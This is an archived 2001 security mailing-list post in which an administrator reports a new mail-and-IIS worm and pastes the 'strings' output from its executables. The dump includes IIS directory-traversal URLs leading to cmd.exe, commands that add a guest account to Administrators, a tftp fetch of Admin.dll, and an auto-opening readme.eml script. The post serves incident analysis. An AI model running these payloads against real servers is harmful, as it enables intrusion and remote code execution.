( sorry for the cross-post, this might have interest for both lists ) Hello all, Today i've received two aparent distinct strange incidents. One sequence of strange mails with executable attachments and a large number of hits on my IDS regarding attemtps to exploit known security problems within Microsoft IIS. At a first glance, I did not understand that those two incidents were related, util I did a "strings \*.exe" to figure out what the hell was that. What I could found out is that this is ( at least for me ), a new virus/worm/whatever that uses SMTP ( exploiting known vulnerabilities within Microsoft Outlook ) and many also known vulnerabilities within Microsoft IIS. Here are some of it's content: <quote> SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\ SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China .... NUL= [rename] \wininit.ini Personal Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders \*.* EXPLORER fsdhqherwqi2001 SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security share c$=c:\ user guest "" localgroup Administrators guest /add localgroup Guests guest /add user guest /active open user guest /add HideFileExt ShowSuperHidden Hidden Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced ... software\microsoft\windows nt\currentversion\perflib /scripts /MSADC /scripts/..%255c.. /_vti_bin/..%255c../..%255c../..%255c.. /_mem_bin/..%255c../..%255c../..%255c.. /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. /scripts/..%c1%1c.. /scripts/..%c0%2f.. /scripts/..%c0%af.. /scripts/..%c1%9c.. /scripts/..%%35%63.. /scripts/..%%35c.. /scripts/..%25%35%63.. /scripts/..%252f.. /root.exe?/c+ /winnt/system32/cmd.exe?/c+ net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest" tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20 Admin.dll c:\Admin.dll d:\Admin.dll e:\Admin.dll html script language="JavaScript" window.open("readme.eml", null, "resizable=no,top=6000,left=6000") script html /Admin.dll GET %s HTTP/1.0 Host: www Connnection: close readme main index default html .asp .htm \readme.eml .exe winzip32.exe riched20.dll .nws .eml .doc .exe ... SYSTEM\CurrentControlSet\Services\lanmanserver\Shares Cache Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail QUIT Subject: From: < DATA RCPT TO: < MAIL FROM: < HELO aabbcc -dontrunold NULL \readme*.exe admin.dll qusery9bnow -qusery9bnow \mmc.exe \riched20.dll boot Shell explorer.exe load.exe -dontrunold \system.ini \load.exe .... </quote> I kept the executables for analysis, if anyone woud like to take a look, drop me an email. So, what I ask is, does anyone know about this worm? I've done a quick search for it and couldn't find nothing like it. Best regards, Joao Gouveia ------------- jgouveiaat_private ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 10:53:04 PDT